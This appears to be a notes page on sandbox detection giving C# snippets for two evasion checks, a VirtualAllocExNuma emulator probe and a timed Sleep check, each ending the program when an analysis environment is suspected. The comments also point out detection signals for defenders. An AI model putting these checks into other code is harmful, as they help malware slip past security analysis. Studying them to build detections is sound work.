Dynamic Analysis

Sandbox Detection

Resources

# Sandbox evasion: calls a rarely emulated API (VirtualAllocExNuma) in an attempt to bypass heuristic/behavioural analysis engines that do not implement it
// P/Invoke declaration for VirtualAllocExNuma exported by kernel32.dll.
// Parameters as declared here: target process handle, requested base address,
// allocation size, allocation type flags, page protection flags, preferred NUMA node.
[DllImport("kernel32.dll")]
private static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);

// Asks for 0x1000 bytes in the current process, at a system-chosen address (IntPtr.Zero),
// with 0x3000 (MEM_COMMIT | MEM_RESERVE), 0x4 (PAGE_READWRITE) and preferred node 0.
// GetCurrentProcess is declared further down the listing.
// Detection note: the returned pointer is not used anywhere in this listing, so the call
// serves only as an environment probe. An import of VirtualAllocExNuma followed by an
// immediate exit path is a useful static-triage signal, and an analysis environment that
// implements this API does not stand out to the probe.
IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0);
// Early-exit branch tied to the allocation result: prints a failure message and returns,
// so nothing after this point runs and the analysis run shows no further behaviour.
if (mem == null)
{
	Console.WriteLine("[-] VirtualAllocExNuma check failed.");
	return;
}
			
# Sleeps for 3 seconds to evade an in-memory scan, then checks whether the emulator fast-forwarded through the sleep call
// P/Invoke declaration for Sleep exported by kernel32.dll; takes the delay in milliseconds.
[DllImport("kernel32.dll")]
static extern void Sleep(uint dwMilliseconds);
		
// P/Invoke declaration for GetCurrentProcess exported by kernel32.dll; returns a handle
// for the calling process.
[DllImport("kernel32.dll")]
static extern IntPtr GetCurrentProcess();

// Timing probe: read the clock, sleep 3000 ms, then measure how many seconds actually elapsed.
DateTime time1 = DateTime.Now;
Sleep(3000);
double time2 = DateTime.Now.Subtract(time1).TotalSeconds;
			
// Less than 2.5 s elapsed for a 3 s sleep is treated as a sign that the delay was shortened
// or skipped; the program prints a failure message and returns without doing anything else.
// Detection note: a clock read, a fixed Sleep, a second clock read and a threshold comparison
// that leads to an early return is a recognisable pattern for static and behavioural rules.
// An analysis environment that accelerates sleeps needs to advance the clock sources it
// exposes by the same amount, otherwise this delta reveals it.
if (time2 < 2.5)
{
	Console.WriteLine("[-] Sleep check failed.");
	return;
}
